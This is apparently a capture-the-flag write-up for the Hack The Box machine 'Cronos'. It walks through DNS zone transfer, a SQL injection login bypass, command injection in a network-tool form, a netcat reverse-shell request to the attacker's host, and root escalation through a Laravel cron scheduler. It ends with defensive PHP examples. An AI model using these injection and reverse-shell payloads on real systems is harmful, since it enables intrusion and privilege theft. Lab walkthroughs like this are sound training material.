Enumeration
1. Nmap
nmap -sV -oA nmap-out 10.10.10.13
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So we are dealing with an Ubuntu machine hosting a web application. Port 53 is also open, with an ISC BIND service running on it. Let’s research it a little bit more.
[ISC Bind 9](https://www.isc.org/bind/) has evolved to be a very flexible, full-featured DNS system. Whatever your application is, BIND 9 probably has the required features. As the first, oldest, and most commonly deployed solution, there are more network engineers who are already familiar with BIND 9 than with any other system.
I was having problems connecting to the web service so I added the IP (10.10.10.13) to the /etc/hosts file with the name cronos.htb.
2. DNS Enumeration
Check out the video from HackerSploit to learn about DNS enumeration and zone transfers; it will help in understanding the following lines.
$ dig axfr @10.10.10.13 cronos.htb
; <<>> DiG 9.16.2-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 28 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 13 07:09:07 UTC 2021
;; XFR size: 7 records (messages 1, bytes 203)
The server answered a full zone transfer (AXFR) for my client, which revealed a couple of hostnames linked to cronos.htb (admin, ns1 and www). Let’s add them to the /etc/hosts file too in order to access them in the browser.

Admin.cronos.htb & SQLi
Going to admin.cronos.htb, a login page is displayed.

An innocent SQLi check lets us in.

Two tools are exposed on the welcome.php page: ping and traceroute. Poking at the application from Burp, I discovered command injection.
Request
POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://admin.cronos.htb
DNT: 1
Connection: close
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
command=traceroute&host=8.8.8.8%3Bls+.
I URL-encoded a semicolon (%3B) and appended the ls command to list the current directory.
Response
HTTP/1.1 200 OK
Date: Tue, 13 Apr 2021 08:01:47 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 527
Connection: close
Content-Type: text/html; charset=UTF-8
<html">
<head>
<title>Net Tool v0.1 </title>
</head>
<body>
<h1>Net Tool v0.1</h1>
<form method="POST" action="">
<select name="command">
<option value="traceroute">traceroute</option>
<option value="ping -c 1">ping</option>
</select>
<input type="text" name="host" value="8.8.8.8"/>
<input type="submit" value="Execute!"/>
</form>
config.php<br>
index.php<br>
logout.php<br>
session.php<br>
welcome.php<br>
<p><a href = "logout.php">Sign Out</a></p>
</body>
</html>
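The directory listing appears after the form because the host field is concatenated into a shell command line. The following PHP is an added example, not the box's welcome.php (its source is not shown on this page): it reconstructs that pattern and then shows a hardened handler; tool paths and function names are assumptions.

```php
<?php
// Added example, not the box's welcome.php (its source is not shown on this page).
// First the pattern that produces the behaviour seen above, then a hardened handler.
// Tool paths and function names are assumptions.

// Vulnerable: both POST fields are concatenated straight into a shell command line,
// so a host value like "8.8.8.8;ls ." runs a second command.
function runNetToolVulnerable(string $command, string $host): string {
    return (string) shell_exec($command . ' ' . $host);
}

// Hardened: the form value is only a key into a fixed allowlist, the host must be a
// valid IP address or hostname, and the argument is shell-escaped as defence in depth.
const NET_TOOLS = [
    'traceroute' => '/usr/sbin/traceroute',
    'ping'       => '/bin/ping -c 1',
];

function isValidHost(string $host): bool {
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    // Strict hostname: dot-separated labels of letters, digits and hyphens, 253 chars max.
    return strlen($host) <= 253
        && preg_match('/^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$/', $host) === 1;
}

// Returns the exact command line that would run, or null when the input is rejected.
function buildNetToolCommand(string $tool, string $host): ?string {
    if (!isset(NET_TOOLS[$tool]) || !isValidHost($host)) {
        return null;
    }
    return NET_TOOLS[$tool] . ' ' . escapeshellarg($host);
}

function runNetToolHardened(string $tool, string $host): ?string {
    $cmd = buildNetToolCommand($tool, $host);
    return $cmd === null ? null : (string) shell_exec($cmd);
}

// Constructed inputs: the benign request and the injected one from this page.
foreach (['8.8.8.8', '8.8.8.8;ls .'] as $host) {
    var_dump(buildNetToolCommand('traceroute', $host));
}
```

The allowlist is the real fix; escapeshellarg() alone would still let an attacker-chosen host reach the tool as a single argument, which is why the host is validated first.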
So, we now know there is a command injection vulnerability. Let’s see if we can locate netcat in order to get a connection to the victim host.
Request
<deleted>
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
command=traceroute&host=8.8.8.8%3Blocate+nc
Response
<deleted>
cute!"/>
</form>
/bin/loginctl<br>
/bin/nc<br>
/bin/nc.openbsd<br>
</deleted>
There is a netcat binary on the machine. Let’s try to use it to our advantage.
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
command=traceroute&host=8.8.8.8%3Bnc+10.10.14.2+1234+-e+/bin/bash
nc 10.10.14.2 1234 -e /bin/bash was unsuccessful. Perhaps a URL-encoding problem?
Check out this Reverse Shell Cheat Sheet
After trying some of the shells, the python2.7 one finally did it, and we have a shell as www-data.
# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.13] 51718
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Running sudo -l returned “no tty present”, so I upgraded my shell:
$ sudo -l
sudo: no tty present and no askpass program specified
$ python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/home/noulis$ export TERM=xterm-256color
export TERM=xterm-256color
[email protected]:/home/noulis$ ^Z
[1]+ Stopped nc -nlvp 1234
# stty raw -echo
# fg
[1]+ Started nc -nlvp 1234
[email protected]:/home/noulis$ stty rows 25 columns 237
[email protected]:/home/noulis$ whoami
www-data
[email protected]:/home/noulis$ sudo -l
[sudo] password for www-data:
Sorry, try again.
Now that the shell works as expected, let’s move on to:
Privesc
Crontab is a task scheduler on Linux systems, and it is usually the very first thing I check when doing Linux boxes. To see whether there are any scheduled tasks, I “catted” the /etc/crontab file:
$ cat /etc/crontab
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
It seems root runs the PHP file artisan from /var/www/laravel/ every minute. Let’s see what this file is and what it does.
$ cat artisan
#!/usr/bin/env php
<?php
/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/
require __DIR__.'/bootstrap/autoload.php';
$app = require_once __DIR__.'/bootstrap/app.php';
/*
|--------------------------------------------------------------------------
| Run The Artisan Application
|--------------------------------------------------------------------------
|
| When we run the console application, the current CLI command will be
| executed in this console and the response sent back to a terminal
| or another output device for the developers. Here goes nothing!
|
*/
$kernel = $app->make(Illuminate\Contracts\Console\Kernel::class);
$status = $kernel->handle(
$input = new Symfony\Component\Console\Input\ArgvInput,
new Symfony\Component\Console\Output\ConsoleOutput
);
/*
|--------------------------------------------------------------------------
| Shutdown The Application
|--------------------------------------------------------------------------
|
| Once Artisan has finished running. We will fire off the shutdown events
| so that any final work may be done by the application before we shut
| down the process. This is the last thing to happen to the request.
|
*/
$kernel->terminate($input, $status);
exit($status);
[email protected]:/var/www/laravel$
So any command that is passed to this console application will be executed as root. I need more information about that, though.
After a while of poking around artisan commands, I found this website, which sheds light on:
Scheduling Shell Commands
The exec method may be used to issue a command to the operating system:
$schedule->exec('node /home/forge/script.js')->daily();
Finally, to get the root flag, I schedule a task that copies the root.txt file to /tmp, changes its ownership from root to www-data (me), and sets its permissions so that it is accessible:
protected function schedule(Schedule $schedule)
{
$schedule->exec('cp /root/root.txt /tmp/;chown www-data:www-data /tmp/root.txt; chmod 4755 /tmp/root.txt')->everyMinute();
// $schedule->command('inspire')
// ->hourly();
}
A minute later, we have a root.txt with the following permissions in /tmp/:
$ ls -la
total 40
drwxrwxrwt 9 root root 4096 Apr 13 15:17 .
drwxr-xr-x 23 root root 4096 Apr 9 2017 ..
drwxrwxrwt 2 root root 4096 Apr 13 14:28 .ICE-unix
drwxrwxrwt 2 root root 4096 Apr 13 14:28 .Test-unix
drwxrwxrwt 2 root root 4096 Apr 13 14:28 .X11-unix
drwxrwxrwt 2 root root 4096 Apr 13 14:28 .XIM-unix
drwxrwxrwt 2 root root 4096 Apr 13 14:28 .font-unix
-rw-r--r-- 1 root root 0 Apr 13 15:11 catted.txt
-rwsr-xr-x 1 www-data www-data 33 Apr 13 15:17 root.txt
drwx------ 3 root root 4096 Apr 13 14:28 systemd-private-162edecf88ca4801b7de1bd826d2c653-systemd-timesyncd.service-JYRg0U
drwx------ 2 root root 4096 Apr 13 14:28 vmware-root
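From the defender's side, the root cause of this privesc is a root cron job that invokes a file under a directory the web user can write to. The following PHP CLI script is an added example, not anything from the box: it parses crontab-style lines (a constructed sample that includes the artisan entry seen above) and flags root jobs that reference a path not owned by root. The ownership map is constructed so the script runs offline; on a real host it would be replaced by fileowner() lookups.

```php
<?php
// Added example, not code from the box: audit crontab entries and flag jobs that run as
// root but invoke a file owned by someone else (the condition abused in this writeup).
// Ownership is a constructed in-memory map so this runs offline; on a real host use
// posix_getpwuid(fileowner($path))['name'] for each path instead.

const CRONTAB = <<<'CRON'
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
*/5 * * * * www-data php /var/www/laravel/artisan queue:work
CRON;

// Constructed ownership data: owner of each path the audit knows about.
const OWNERS = [
    '/etc/cron.hourly'         => 'root',
    '/var/www/laravel'         => 'www-data',
    '/var/www/laravel/artisan' => 'www-data',
];

function parseCrontab(string $text): array {
    $jobs = [];
    foreach (explode("\n", $text) as $line) {
        $line = trim($line);
        if ($line === '' || $line[0] === '#') continue;   // skip blank lines and comments
        $f = preg_split('/\s+/', $line, 7);                // m h dom mon dow user command
        if (count($f) < 7) continue;
        $jobs[] = ['user' => $f[5], 'command' => $f[6]];
    }
    return $jobs;
}

// Absolute paths referenced by a command string that the ownership map knows about.
function referencedPaths(string $command): array {
    preg_match_all('#(?<![\w.])/[\w./-]+#', $command, $m);
    return array_values(array_filter($m[0], fn($p) => isset(OWNERS[$p])));
}

function findRootJobsWithUntrustedFiles(string $crontab): array {
    $findings = [];
    foreach (parseCrontab($crontab) as $job) {
        if ($job['user'] !== 'root') continue;             // only root jobs matter here
        foreach (referencedPaths($job['command']) as $path) {
            if (OWNERS[$path] !== 'root') {
                $findings[] = sprintf('root job "%s" invokes %s owned by %s',
                                      $job['command'], $path, OWNERS[$path]);
            }
        }
    }
    return $findings;
}

foreach (findRootJobsWithUntrustedFiles(CRONTAB) as $finding) echo $finding, PHP_EOL;
```

Only the artisan job is reported: the hourly run-parts entry points at a root-owned path, and the queue:work entry does not run as root.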